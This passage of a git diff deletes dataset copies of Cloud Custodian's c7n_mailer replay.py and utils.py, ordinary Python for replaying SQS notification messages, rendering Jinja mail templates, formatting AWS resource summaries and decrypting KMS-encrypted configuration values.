b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.target.py deleted file mode 100644 index e8c99cc..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.target.py +++ /dev/null @@ -1,144 +0,0 @@ -""" -Allow local testing of mailer and templates by replaying an SQS message. - -MAILER_FILE input is a file containing the exact base64-encoded, gzipped -data that's enqueued to SQS via :py:meth:`c7n.actions.Notify.send_sqs`. - -Alternatively, with -p|--plain specified, the file will be assumed to be -JSON data that can be loaded directly. 
-""" -from __future__ import absolute_import, division, print_function, unicode_literals - -import argparse -import base64 -import json -import logging -import os -import zlib -import yaml - -import boto3 -import jsonschema -from c7n_mailer.cli import CONFIG_SCHEMA -from c7n_mailer.email_delivery import EmailDelivery -from c7n_mailer.utils import setup_defaults -from c7n_mailer.utils_email import get_mimetext_message - -logger = logging.getLogger(__name__) - - -class MailerTester(object): - - def __init__(self, msg_file, config, msg_plain=False, json_dump_file=None): - if not os.path.exists(msg_file): - raise RuntimeError("File does not exist: %s" % msg_file) - logger.debug('Reading message from: %s', msg_file) - with open(msg_file, 'r') as fh: - raw = fh.read() - logger.debug('Read %d byte message', len(raw)) - if msg_plain: - raw = raw.strip() - else: - logger.debug('base64-decoding and zlib decompressing message') - raw = zlib.decompress(base64.b64decode(raw)) - if json_dump_file is not None: - with open(json_dump_file, 'wb') as fh: # pragma: no cover - fh.write(raw) - self.data = json.loads(raw) - logger.debug('Loaded message JSON') - self.config = config - self.session = boto3.Session() - - def run(self, dry_run=False, print_only=False): - emd = EmailDelivery(self.config, self.session, logger) - addrs_to_msgs = emd.get_to_addrs_email_messages_map(self.data) - logger.info('Would send email to: %s', addrs_to_msgs.keys()) - if print_only: - mime = get_mimetext_message( - self.config, - logger, - self.data, - self.data['resources'], - ['foo@example.com'] - ) - logger.info('Send mail with subject: "%s"', mime['Subject']) - print(mime.get_payload(None, True).decode('utf-8')) - return - if dry_run: - for to_addrs, mimetext_msg in addrs_to_msgs.items(): - print('-> SEND MESSAGE TO: %s' % '; '.join(to_addrs)) - print(mimetext_msg.get_payload(None, True).decode('utf-8')) - return - # else actually send the message... 
- for to_addrs, mimetext_msg in addrs_to_msgs.items(): - logger.info('Actually sending mail to: %s', to_addrs) - emd.send_c7n_email(self.data, list(to_addrs), mimetext_msg) - - -def setup_parser(): - parser = argparse.ArgumentParser('Test c7n-mailer templates and mail') - parser.add_argument('-c', '--config', required=True) - parser.add_argument('-d', '--dry-run', dest='dry_run', action='store_true', - default=False, - help='Log messages that would be sent, but do not send') - parser.add_argument('-T', '--template-print', dest='print_only', - action='store_true', default=False, - help='Just print rendered templates') - parser.add_argument('-t', '--templates', default=None, type=str, - help='message templates folder location') - parser.add_argument('-p', '--plain', dest='plain', action='store_true', - default=False, - help='Expect MESSAGE_FILE to be a plain string, ' - 'rather than the base64-encoded, gzipped SQS ' - 'message format') - parser.add_argument('-j', '--json-dump-file', dest='json_dump_file', - type=str, action='store', default=None, - help='If dump JSON of MESSAGE_FILE to this path; ' - 'useful to base64-decode and gunzip a message') - parser.add_argument('MESSAGE_FILE', type=str, - help='Path to SQS message dump/content file') - return parser - - -def session_factory(config): - return boto3.Session( - region_name=config['region'], - profile_name=config.get('profile')) - - -def main(): - parser = setup_parser() - options = parser.parse_args() - - module_dir = os.path.dirname(os.path.abspath(__file__)) - default_templates = [ - os.path.abspath(os.path.join(module_dir, 'msg-templates')), - os.path.abspath(os.path.join(module_dir, '..', 'msg-templates')), - os.path.abspath('.') - ] - templates = options.templates - if templates: - default_templates.append( - os.path.abspath(os.path.expanduser(os.path.expandvars(templates))) - ) - - log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' - logging.basicConfig(level=logging.DEBUG, format=log_format) - logging.getLogger('botocore').setLevel(logging.WARNING) - - with open(options.config) as fh: - config = yaml.load(fh.read(), Loader=yaml.SafeLoader) - - jsonschema.validate(config, CONFIG_SCHEMA) - setup_defaults(config) - config['templates_folders'] = default_templates - - tester = MailerTester( - options.MESSAGE_FILE, config, msg_plain=options.plain, - json_dump_file=options.json_dump_file - ) - tester.run(options.dry_run, options.print_only) - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.diff b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.diff deleted file mode 100644 index 91df1ec..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.diff +++ /dev/null @@ -1,19 +0,0 @@ -diff --git a/tools/c7n_mailer/c7n_mailer/utils.py b/tools/c7n_mailer/c7n_mailer/utils.py - index 9f02c55e03a4ad372fdc9632b64491d93787dc94..12e3e8084ddb2e7f5ccbc5ea3c3bd3e4c7e9c207 100644 - --- a/tools/c7n_mailer/c7n_mailer/utils.py - +++ b/tools/c7n_mailer/c7n_mailer/utils.py -@@ -19,13 +19,13 @@ import functools - import json - import os - import time -+import yaml - - import jinja2 - import jmespath - from botocore.exceptions import ClientError - from dateutil import parser - from dateutil.tz import gettz, tzutc --from ruamel import yaml - - - class Providers(object): diff --git 
a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.source.py b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.source.py deleted file mode 100644 index 5e8ccaf..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.source.py +++ /dev/null @@ -1,437 +0,0 @@ -# Copyright 2015-2017 Capital One Services, LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -from __future__ import absolute_import, division, print_function, unicode_literals - -import base64 -from datetime import datetime, timedelta -import functools -import json -import os -import time - -import jinja2 -import jmespath -from botocore.exceptions import ClientError -from dateutil import parser -from dateutil.tz import gettz, tzutc -from ruamel import yaml - - -class Providers(object): - AWS = 0 - Azure = 1 - - -def get_jinja_env(template_folders): - env = jinja2.Environment(trim_blocks=True, autoescape=False) - env.filters['yaml_safe'] = functools.partial(yaml.safe_dump, default_flow_style=False) - env.filters['date_time_format'] = date_time_format - env.filters['get_date_time_delta'] = get_date_time_delta - env.filters['from_json'] = json.loads - env.filters['get_date_age'] = get_date_age - env.globals['format_resource'] = resource_format - env.globals['format_struct'] = format_struct - env.globals['resource_tag'] = get_resource_tag_value - env.globals['get_resource_tag_value'] = get_resource_tag_value - env.globals['search'] = jmespath.search - env.loader = jinja2.FileSystemLoader(template_folders) - return env - - -def get_rendered_jinja( - target, sqs_message, resources, logger, - specified_template, default_template, template_folders): - env = get_jinja_env(template_folders) - mail_template = sqs_message['action'].get(specified_template, default_template) - if not os.path.isabs(mail_template): - mail_template = '%s.j2' % mail_template - try: - template = env.get_template(mail_template) - except Exception as error_msg: - logger.error("Invalid template reference %s\n%s" % (mail_template, error_msg)) - return - - # recast seconds since epoch as utc iso datestring, template - # authors can use date_time_format helper func to convert local - # tz. if no execution start time was passed use current time. 
- execution_start = datetime.utcfromtimestamp( - sqs_message.get( - 'execution_start', - time.mktime( - datetime.utcnow().timetuple()) - )).isoformat() - - rendered_jinja = template.render( - recipient=target, - resources=resources, - account=sqs_message.get('account', ''), - account_id=sqs_message.get('account_id', ''), - event=sqs_message.get('event', None), - action=sqs_message['action'], - policy=sqs_message['policy'], - execution_start=execution_start, - region=sqs_message.get('region', '')) - return rendered_jinja - - -# eg, target_tag_keys could be resource-owners ['Owners', 'SupportTeam'] -# and this function would go through the resource and look for any tag keys -# that match Owners or SupportTeam, and return those values as targets -def get_resource_tag_targets(resource, target_tag_keys): - if 'Tags' not in resource: - return [] - if isinstance(resource['Tags'], dict): - tags = resource['Tags'] - else: - tags = {tag['Key']: tag['Value'] for tag in resource['Tags']} - targets = [] - for target_tag_key in target_tag_keys: - if target_tag_key in tags: - targets.append(tags[target_tag_key]) - return targets - - -def get_message_subject(sqs_message): - default_subject = 'Custodian notification - %s' % (sqs_message['policy']['name']) - subject = sqs_message['action'].get('subject', default_subject) - jinja_template = jinja2.Template(subject) - subject = jinja_template.render( - account=sqs_message.get('account', ''), - account_id=sqs_message.get('account_id', ''), - event=sqs_message.get('event', None), - action=sqs_message['action'], - policy=sqs_message['policy'], - region=sqs_message.get('region', '') - ) - return subject - - -def setup_defaults(config): - config.setdefault('region', 'us-east-1') - config.setdefault('ses_region', config.get('region')) - config.setdefault('memory', 1024) - config.setdefault('runtime', 'python3.7') - config.setdefault('timeout', 300) - config.setdefault('subnets', None) - config.setdefault('security_groups', None) - config.setdefault('contact_tags', []) - config.setdefault('ldap_uri', None) - config.setdefault('ldap_bind_dn', None) - config.setdefault('ldap_bind_user', None) - config.setdefault('ldap_bind_password', None) - config.setdefault('datadog_api_key', None) - config.setdefault('slack_token', None) - config.setdefault('slack_webhook', None) - - -def date_time_format(utc_str, tz_str='US/Eastern', format='%Y %b %d %H:%M %Z'): - return parser.parse(utc_str).astimezone(gettz(tz_str)).strftime(format) - - -def get_date_time_delta(delta): - return str(datetime.now().replace(tzinfo=gettz('UTC')) + timedelta(delta)) - - -def get_date_age(date): - return (datetime.now(tz=tzutc()) - parser.parse(date)).days - - -def format_struct(evt): - return json.dumps(evt, indent=2, ensure_ascii=False) - - -def get_resource_tag_value(resource, k): - for t in resource.get('Tags', []): - if t['Key'] == k: - return t['Value'] - return '' - - -def strip_prefix(value, prefix): - if value.startswith(prefix): - return value[len(prefix):] - return value - - -def resource_format(resource, resource_type): - if resource_type.startswith('aws.'): - resource_type = strip_prefix(resource_type, 'aws.') - if resource_type == 'ec2': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - return "%s %s %s %s %s %s" % ( - resource['InstanceId'], - resource.get('VpcId', 'NO VPC!'), - resource['InstanceType'], - resource.get('LaunchTime'), - tag_map.get('Name', ''), - resource.get('PrivateIpAddress')) - elif resource_type == 'ami': - return "%s %s %s" % ( - 
resource.get('Name'), resource['ImageId'], resource['CreationDate']) - elif resource_type == 'sagemaker-notebook': - return "%s" % (resource['NotebookInstanceName']) - elif resource_type == 's3': - return "%s" % (resource['Name']) - elif resource_type == 'ebs': - return "%s %s %s %s" % ( - resource['VolumeId'], - resource['Size'], - resource['State'], - resource['CreateTime']) - elif resource_type == 'rds': - return "%s %s %s %s" % ( - resource['DBInstanceIdentifier'], - "%s-%s" % ( - resource['Engine'], resource['EngineVersion']), - resource['DBInstanceClass'], - resource['AllocatedStorage']) - elif resource_type == 'asg': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - return "%s %s %s" % ( - resource['AutoScalingGroupName'], - tag_map.get('Name', ''), - "instances: %d" % (len(resource.get('Instances', [])))) - elif resource_type == 'elb': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - if 'ProhibitedPolicies' in resource: - return "%s %s %s %s" % ( - resource['LoadBalancerName'], - "instances: %d" % len(resource['Instances']), - "zones: %d" % len(resource['AvailabilityZones']), - "prohibited_policies: %s" % ','.join( - resource['ProhibitedPolicies'])) - return "%s %s %s" % ( - resource['LoadBalancerName'], - "instances: %d" % len(resource['Instances']), - "zones: %d" % len(resource['AvailabilityZones'])) - elif resource_type == 'redshift': - return "%s %s %s" % ( - resource['ClusterIdentifier'], - 'nodes:%d' % len(resource['ClusterNodes']), - 'encrypted:%s' % resource['Encrypted']) - elif resource_type == 'emr': - return "%s status:%s" % ( - resource['Id'], - resource['Status']['State']) - elif resource_type == 'cfn': - return "%s" % ( - resource['StackName']) - elif resource_type == 'launch-config': - return "%s" % ( - resource['LaunchConfigurationName']) - elif resource_type == 'security-group': - name = resource.get('GroupName', '') - for t in resource.get('Tags', ()): - if t['Key'] == 'Name': - name = t['Value'] - return "%s %s %s inrules: %d outrules: %d" % ( - name, - resource['GroupId'], - resource.get('VpcId', 'na'), - len(resource.get('IpPermissions', ())), - len(resource.get('IpPermissionsEgress', ()))) - elif resource_type == 'log-group': - if 'lastWrite' in resource: - return "name: %s last_write: %s" % ( - resource['logGroupName'], - resource['lastWrite']) - return "name: %s" % (resource['logGroupName']) - elif resource_type == 'cache-cluster': - return "name: %s created: %s status: %s" % ( - resource['CacheClusterId'], - resource['CacheClusterCreateTime'], - resource['CacheClusterStatus']) - elif resource_type == 'cache-snapshot': - cid = resource.get('CacheClusterId') - if cid is None: - cid = ', '.join([ - ns['CacheClusterId'] for ns in resource['NodeSnapshots']]) - return "name: %s cluster: %s source: %s" % ( - resource['SnapshotName'], - cid, - resource['SnapshotSource']) - elif resource_type == 'redshift-snapshot': - return "name: %s db: %s" % ( - resource['SnapshotIdentifier'], - resource['DBName']) - elif resource_type == 'ebs-snapshot': - return "name: %s date: %s" % ( - resource['SnapshotId'], - resource['StartTime']) - elif resource_type == 'subnet': - return "%s %s %s %s %s %s" % ( - resource['SubnetId'], - resource['VpcId'], - resource['AvailabilityZone'], - resource['State'], - resource['CidrBlock'], - resource['AvailableIpAddressCount']) - elif resource_type == 'account': - return " %s %s" % ( - resource['account_id'], - resource['account_name']) - elif resource_type == 'cloudtrail': - return "%s" % ( - 
resource['Name']) - elif resource_type == 'vpc': - return "%s " % ( - resource['VpcId']) - elif resource_type == 'iam-group': - return " %s %s %s" % ( - resource['GroupName'], - resource['Arn'], - resource['CreateDate']) - elif resource_type == 'rds-snapshot': - return " %s %s %s" % ( - resource['DBSnapshotIdentifier'], - resource['DBInstanceIdentifier'], - resource['SnapshotCreateTime']) - elif resource_type == 'iam-user': - return " %s " % ( - resource['UserName']) - elif resource_type == 'iam-role': - return " %s %s " % ( - resource['RoleName'], - resource['CreateDate']) - elif resource_type == 'iam-policy': - return " %s " % ( - resource['PolicyName']) - elif resource_type == 'iam-profile': - return " %s " % ( - resource['InstanceProfileId']) - elif resource_type == 'dynamodb-table': - return "name: %s created: %s status: %s" % ( - resource['TableName'], - resource['CreationDateTime'], - resource['TableStatus']) - elif resource_type == "sqs": - return "QueueURL: %s QueueArn: %s " % ( - resource['QueueUrl'], - resource['QueueArn']) - elif resource_type == "efs": - return "name: %s id: %s state: %s" % ( - resource['Name'], - resource['FileSystemId'], - resource['LifeCycleState'] - ) - elif resource_type == "network-addr": - return "ip: %s id: %s scope: %s" % ( - resource['PublicIp'], - resource['AllocationId'], - resource['Domain'] - ) - elif resource_type == "route-table": - return "id: %s vpc: %s" % ( - resource['RouteTableId'], - resource['VpcId'] - ) - elif resource_type == "app-elb": - return "arn: %s zones: %s scheme: %s" % ( - resource['LoadBalancerArn'], - len(resource['AvailabilityZones']), - resource['Scheme']) - elif resource_type == "nat-gateway": - return "id: %s state: %s vpc: %s" % ( - resource['NatGatewayId'], - resource['State'], - resource['VpcId']) - elif resource_type == "internet-gateway": - return "id: %s attachments: %s" % ( - resource['InternetGatewayId'], - len(resource['Attachments'])) - elif resource_type == 'lambda': - return "Name: %s RunTime: %s \n" % ( - resource['FunctionName'], - resource['Runtime']) - else: - return "%s" % format_struct(resource) - - -def get_provider(mailer_config): - if mailer_config.get('queue_url', '').startswith('asq://'): - return Providers.Azure - - return Providers.AWS - - -def kms_decrypt(config, logger, session, encrypted_field): - if config.get(encrypted_field): - try: - kms = session.client('kms') - return kms.decrypt( - CiphertextBlob=base64.b64decode(config[encrypted_field]))[ - 'Plaintext'].decode('utf8') - except (TypeError, base64.binascii.Error) as e: - logger.warning( - "Error: %s Unable to base64 decode %s, will assume plaintext." % - (e, encrypted_field)) - except ClientError as e: - if e.response['Error']['Code'] != 'InvalidCiphertextException': - raise - logger.warning( - "Error: %s Unable to decrypt %s with kms, will assume plaintext." 
% - (e, encrypted_field)) - return config[encrypted_field] - else: - logger.debug("No encrypted value to decrypt.") - return None - - -def decrypt(config, logger, session, encrypted_field): - if config.get(encrypted_field): - provider = get_provider(config) - if provider == Providers.Azure: - from c7n_mailer.azure_mailer.utils import azure_decrypt - return azure_decrypt(config, logger, session, encrypted_field) - elif provider == Providers.AWS: - return kms_decrypt(config, logger, session, encrypted_field) - else: - raise Exception("Unknown provider") - else: - logger.debug("No encrypted value to decrypt.") - return None - - -# https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-user-identity.html -def get_aws_username_from_event(logger, event): - if event is None: - return None - identity = event.get('detail', {}).get('userIdentity', {}) - if not identity: - logger.warning("Could not get recipient from event \n %s" % ( - format_struct(event))) - return None - if identity['type'] == 'AssumedRole': - logger.debug( - 'In some cases there is no ldap uid is associated with AssumedRole: %s', - identity['arn']) - logger.debug( - 'We will try to assume that identity is in the AssumedRoleSessionName') - user = identity['arn'].rsplit('/', 1)[-1] - if user is None or user.startswith('i-') or user.startswith('awslambda'): - return None - if ':' in user: - user = user.split(':', 1)[-1] - return user - if identity['type'] == 'IAMUser' or identity['type'] == 'WebIdentityUser': - return identity['userName'] - if identity['type'] == 'Root': - return None - # this conditional is left here as a last resort, it should - # be better documented with an example UserIdentity json - if ':' in identity['principalId']: - user_id = identity['principalId'].split(':', 1)[-1] - else: - user_id = identity['principalId'] - return user_id diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.target.py b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.target.py deleted file mode 100644 index 87cdce2..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.target.py +++ /dev/null @@ -1,437 +0,0 @@ -# Copyright 2015-2017 Capital One Services, LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. 
-from __future__ import absolute_import, division, print_function, unicode_literals - -import base64 -from datetime import datetime, timedelta -import functools -import json -import os -import time -import yaml - -import jinja2 -import jmespath -from botocore.exceptions import ClientError -from dateutil import parser -from dateutil.tz import gettz, tzutc - - -class Providers(object): - AWS = 0 - Azure = 1 - - -def get_jinja_env(template_folders): - env = jinja2.Environment(trim_blocks=True, autoescape=False) - env.filters['yaml_safe'] = functools.partial(yaml.safe_dump, default_flow_style=False) - env.filters['date_time_format'] = date_time_format - env.filters['get_date_time_delta'] = get_date_time_delta - env.filters['from_json'] = json.loads - env.filters['get_date_age'] = get_date_age - env.globals['format_resource'] = resource_format - env.globals['format_struct'] = format_struct - env.globals['resource_tag'] = get_resource_tag_value - env.globals['get_resource_tag_value'] = get_resource_tag_value - env.globals['search'] = jmespath.search - env.loader = jinja2.FileSystemLoader(template_folders) - return env - - -def get_rendered_jinja( - target, sqs_message, resources, logger, - specified_template, default_template, template_folders): - env = get_jinja_env(template_folders) - mail_template = sqs_message['action'].get(specified_template, default_template) - if not os.path.isabs(mail_template): - mail_template = '%s.j2' % mail_template - try: - template = env.get_template(mail_template) - except Exception as error_msg: - logger.error("Invalid template reference %s\n%s" % (mail_template, error_msg)) - return - - # recast seconds since epoch as utc iso datestring, template - # authors can use date_time_format helper func to convert local - # tz. if no execution start time was passed use current time. 
- execution_start = datetime.utcfromtimestamp( - sqs_message.get( - 'execution_start', - time.mktime( - datetime.utcnow().timetuple()) - )).isoformat() - - rendered_jinja = template.render( - recipient=target, - resources=resources, - account=sqs_message.get('account', ''), - account_id=sqs_message.get('account_id', ''), - event=sqs_message.get('event', None), - action=sqs_message['action'], - policy=sqs_message['policy'], - execution_start=execution_start, - region=sqs_message.get('region', '')) - return rendered_jinja - - -# eg, target_tag_keys could be resource-owners ['Owners', 'SupportTeam'] -# and this function would go through the resource and look for any tag keys -# that match Owners or SupportTeam, and return those values as targets -def get_resource_tag_targets(resource, target_tag_keys): - if 'Tags' not in resource: - return [] - if isinstance(resource['Tags'], dict): - tags = resource['Tags'] - else: - tags = {tag['Key']: tag['Value'] for tag in resource['Tags']} - targets = [] - for target_tag_key in target_tag_keys: - if target_tag_key in tags: - targets.append(tags[target_tag_key]) - return targets - - -def get_message_subject(sqs_message): - default_subject = 'Custodian notification - %s' % (sqs_message['policy']['name']) - subject = sqs_message['action'].get('subject', default_subject) - jinja_template = jinja2.Template(subject) - subject = jinja_template.render( - account=sqs_message.get('account', ''), - account_id=sqs_message.get('account_id', ''), - event=sqs_message.get('event', None), - action=sqs_message['action'], - policy=sqs_message['policy'], - region=sqs_message.get('region', '') - ) - return subject - - -def setup_defaults(config): - config.setdefault('region', 'us-east-1') - config.setdefault('ses_region', config.get('region')) - config.setdefault('memory', 1024) - config.setdefault('runtime', 'python3.7') - config.setdefault('timeout', 300) - config.setdefault('subnets', None) - config.setdefault('security_groups', None) - config.setdefault('contact_tags', []) - config.setdefault('ldap_uri', None) - config.setdefault('ldap_bind_dn', None) - config.setdefault('ldap_bind_user', None) - config.setdefault('ldap_bind_password', None) - config.setdefault('datadog_api_key', None) - config.setdefault('slack_token', None) - config.setdefault('slack_webhook', None) - - -def date_time_format(utc_str, tz_str='US/Eastern', format='%Y %b %d %H:%M %Z'): - return parser.parse(utc_str).astimezone(gettz(tz_str)).strftime(format) - - -def get_date_time_delta(delta): - return str(datetime.now().replace(tzinfo=gettz('UTC')) + timedelta(delta)) - - -def get_date_age(date): - return (datetime.now(tz=tzutc()) - parser.parse(date)).days - - -def format_struct(evt): - return json.dumps(evt, indent=2, ensure_ascii=False) - - -def get_resource_tag_value(resource, k): - for t in resource.get('Tags', []): - if t['Key'] == k: - return t['Value'] - return '' - - -def strip_prefix(value, prefix): - if value.startswith(prefix): - return value[len(prefix):] - return value - - -def resource_format(resource, resource_type): - if resource_type.startswith('aws.'): - resource_type = strip_prefix(resource_type, 'aws.') - if resource_type == 'ec2': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - return "%s %s %s %s %s %s" % ( - resource['InstanceId'], - resource.get('VpcId', 'NO VPC!'), - resource['InstanceType'], - resource.get('LaunchTime'), - tag_map.get('Name', ''), - resource.get('PrivateIpAddress')) - elif resource_type == 'ami': - return "%s %s %s" % ( - 
resource.get('Name'), resource['ImageId'], resource['CreationDate']) - elif resource_type == 'sagemaker-notebook': - return "%s" % (resource['NotebookInstanceName']) - elif resource_type == 's3': - return "%s" % (resource['Name']) - elif resource_type == 'ebs': - return "%s %s %s %s" % ( - resource['VolumeId'], - resource['Size'], - resource['State'], - resource['CreateTime']) - elif resource_type == 'rds': - return "%s %s %s %s" % ( - resource['DBInstanceIdentifier'], - "%s-%s" % ( - resource['Engine'], resource['EngineVersion']), - resource['DBInstanceClass'], - resource['AllocatedStorage']) - elif resource_type == 'asg': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - return "%s %s %s" % ( - resource['AutoScalingGroupName'], - tag_map.get('Name', ''), - "instances: %d" % (len(resource.get('Instances', [])))) - elif resource_type == 'elb': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - if 'ProhibitedPolicies' in resource: - return "%s %s %s %s" % ( - resource['LoadBalancerName'], - "instances: %d" % len(resource['Instances']), - "zones: %d" % len(resource['AvailabilityZones']), - "prohibited_policies: %s" % ','.join( - resource['ProhibitedPolicies'])) - return "%s %s %s" % ( - resource['LoadBalancerName'], - "instances: %d" % len(resource['Instances']), - "zones: %d" % len(resource['AvailabilityZones'])) - elif resource_type == 'redshift': - return "%s %s %s" % ( - resource['ClusterIdentifier'], - 'nodes:%d' % len(resource['ClusterNodes']), - 'encrypted:%s' % resource['Encrypted']) - elif resource_type == 'emr': - return "%s status:%s" % ( - resource['Id'], - resource['Status']['State']) - elif resource_type == 'cfn': - return "%s" % ( - resource['StackName']) - elif resource_type == 'launch-config': - return "%s" % ( - resource['LaunchConfigurationName']) - elif resource_type == 'security-group': - name = resource.get('GroupName', '') - for t in resource.get('Tags', ()): - if t['Key'] == 'Name': - name = t['Value'] - return "%s %s %s inrules: %d outrules: %d" % ( - name, - resource['GroupId'], - resource.get('VpcId', 'na'), - len(resource.get('IpPermissions', ())), - len(resource.get('IpPermissionsEgress', ()))) - elif resource_type == 'log-group': - if 'lastWrite' in resource: - return "name: %s last_write: %s" % ( - resource['logGroupName'], - resource['lastWrite']) - return "name: %s" % (resource['logGroupName']) - elif resource_type == 'cache-cluster': - return "name: %s created: %s status: %s" % ( - resource['CacheClusterId'], - resource['CacheClusterCreateTime'], - resource['CacheClusterStatus']) - elif resource_type == 'cache-snapshot': - cid = resource.get('CacheClusterId') - if cid is None: - cid = ', '.join([ - ns['CacheClusterId'] for ns in resource['NodeSnapshots']]) - return "name: %s cluster: %s source: %s" % ( - resource['SnapshotName'], - cid, - resource['SnapshotSource']) - elif resource_type == 'redshift-snapshot': - return "name: %s db: %s" % ( - resource['SnapshotIdentifier'], - resource['DBName']) - elif resource_type == 'ebs-snapshot': - return "name: %s date: %s" % ( - resource['SnapshotId'], - resource['StartTime']) - elif resource_type == 'subnet': - return "%s %s %s %s %s %s" % ( - resource['SubnetId'], - resource['VpcId'], - resource['AvailabilityZone'], - resource['State'], - resource['CidrBlock'], - resource['AvailableIpAddressCount']) - elif resource_type == 'account': - return " %s %s" % ( - resource['account_id'], - resource['account_name']) - elif resource_type == 'cloudtrail': - return "%s" % ( - 
resource['Name']) - elif resource_type == 'vpc': - return "%s " % ( - resource['VpcId']) - elif resource_type == 'iam-group': - return " %s %s %s" % ( - resource['GroupName'], - resource['Arn'], - resource['CreateDate']) - elif resource_type == 'rds-snapshot': - return " %s %s %s" % ( - resource['DBSnapshotIdentifier'], - resource['DBInstanceIdentifier'], - resource['SnapshotCreateTime']) - elif resource_type == 'iam-user': - return " %s " % ( - resource['UserName']) - elif resource_type == 'iam-role': - return " %s %s " % ( - resource['RoleName'], - resource['CreateDate']) - elif resource_type == 'iam-policy': - return " %s " % ( - resource['PolicyName']) - elif resource_type == 'iam-profile': - return " %s " % ( - resource['InstanceProfileId']) - elif resource_type == 'dynamodb-table': - return "name: %s created: %s status: %s" % ( - resource['TableName'], - resource['CreationDateTime'], - resource['TableStatus']) - elif resource_type == "sqs": - return "QueueURL: %s QueueArn: %s " % ( - resource['QueueUrl'], - resource['QueueArn']) - elif resource_type == "efs": - return "name: %s id: %s state: %s" % ( - resource['Name'], - resource['FileSystemId'], - resource['LifeCycleState'] - ) - elif resource_type == "network-addr": - return "ip: %s id: %s scope: %s" % ( - resource['PublicIp'], - resource['AllocationId'], - resource['Domain'] - ) - elif resource_type == "route-table": - return "id: %s vpc: %s" % ( - resource['RouteTableId'], - resource['VpcId'] - ) - elif resource_type == "app-elb": - return "arn: %s zones: %s scheme: %s" % ( - resource['LoadBalancerArn'], - len(resource['AvailabilityZones']), - resource['Scheme']) - elif resource_type == "nat-gateway": - return "id: %s state: %s vpc: %s" % ( - resource['NatGatewayId'], - resource['State'], - resource['VpcId']) - elif resource_type == "internet-gateway": - return "id: %s attachments: %s" % ( - resource['InternetGatewayId'], - len(resource['Attachments'])) - elif resource_type == 'lambda': - return "Name: %s RunTime: %s \n" % ( - resource['FunctionName'], - resource['Runtime']) - else: - return "%s" % format_struct(resource) - - -def get_provider(mailer_config): - if mailer_config.get('queue_url', '').startswith('asq://'): - return Providers.Azure - - return Providers.AWS - - -def kms_decrypt(config, logger, session, encrypted_field): - if config.get(encrypted_field): - try: - kms = session.client('kms') - return kms.decrypt( - CiphertextBlob=base64.b64decode(config[encrypted_field]))[ - 'Plaintext'].decode('utf8') - except (TypeError, base64.binascii.Error) as e: - logger.warning( - "Error: %s Unable to base64 decode %s, will assume plaintext." % - (e, encrypted_field)) - except ClientError as e: - if e.response['Error']['Code'] != 'InvalidCiphertextException': - raise - logger.warning( - "Error: %s Unable to decrypt %s with kms, will assume plaintext." 
% - (e, encrypted_field)) - return config[encrypted_field] - else: - logger.debug("No encrypted value to decrypt.") - return None - - -def decrypt(config, logger, session, encrypted_field): - if config.get(encrypted_field): - provider = get_provider(config) - if provider == Providers.Azure: - from c7n_mailer.azure_mailer.utils import azure_decrypt - return azure_decrypt(config, logger, session, encrypted_field) - elif provider == Providers.AWS: - return kms_decrypt(config, logger, session, encrypted_field) - else: - raise Exception("Unknown provider") - else: - logger.debug("No encrypted value to decrypt.") - return None - - -# https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-user-identity.html -def get_aws_username_from_event(logger, event): - if event is None: - return None - identity = event.get('detail', {}).get('userIdentity', {}) - if not identity: - logger.warning("Could not get recipient from event \n %s" % ( - format_struct(event))) - return None - if identity['type'] == 'AssumedRole': - logger.debug( - 'In some cases there is no ldap uid is associated with AssumedRole: %s', - identity['arn']) - logger.debug( - 'We will try to assume that identity is in the AssumedRoleSessionName') - user = identity['arn'].rsplit('/', 1)[-1] - if user is None or user.startswith('i-') or user.startswith('awslambda'): - return None - if ':' in user: - user = user.split(':', 1)[-1] - return user - if identity['type'] == 'IAMUser' or identity['type'] == 'WebIdentityUser': - return identity['userName'] - if identity['type'] == 'Root': - return None - # this conditional is left here as a last resort, it should - # be better documented with an example UserIdentity json - if ':' in identity['principalId']: - user_id = identity['principalId'].split(':', 1)[-1] - else: - user_id = 